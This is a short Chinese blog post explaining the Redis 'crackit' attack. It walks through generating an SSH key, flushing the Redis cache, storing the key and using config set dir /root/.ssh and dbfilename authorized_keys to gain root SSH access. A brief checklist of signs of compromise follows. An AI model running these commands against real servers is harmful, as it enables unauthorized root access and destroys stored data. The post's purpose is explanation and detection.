Redis crackit漏洞

參考http://www.aneasystone.com/archives/2015/11/redis-crackit.html

當(dāng)服務(wù)器上的Redis設(shè)置允許用戶遠程訪問時就存在了風(fēng)險,當(dāng)外來者破解了你的Redis密碼后就可以通過Redis免密碼登錄遠程服務(wù)器

  • 遠程登錄redis命令:
redis-cli -h ip -a password

入侵

1.入侵前準備

  • 本地生成公鑰ssh-key:
    $ ssh-keygen -t rsa
  • 加換行生成文件foo
    (echo -e "\n\n"; cat id_rsa.pub; echo -e"\n\n") > foo

2.清空redis緩存

flushall

3.將公鑰寫入redis

$ cat foo | redis-cli -h ip -a password -x set crackit

4.登錄redis

$ redis-cli -h ip -a password
ip:port> config set dir /root/.ssh/                       固定位置(redis沒有創(chuàng)建文件夾的權(quán)限)
ip:port> config get dir                                   查看位置
ip:port> config set dbfilename authorized_keys            把文件存進指定文件
ip:port> save

如何判斷是否中槍

  1. 緩存被莫名清空
  2. 緩存中多了一個 crackit (或其他類似的)鍵
  3. 使用 redis 的 config get dir 命令檢查是否指向了 /root/.ssh
  4. /.ssh/authorized_keys 文件有被篡改的痕跡
  5. 服務(wù)器上運行著不明進程
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容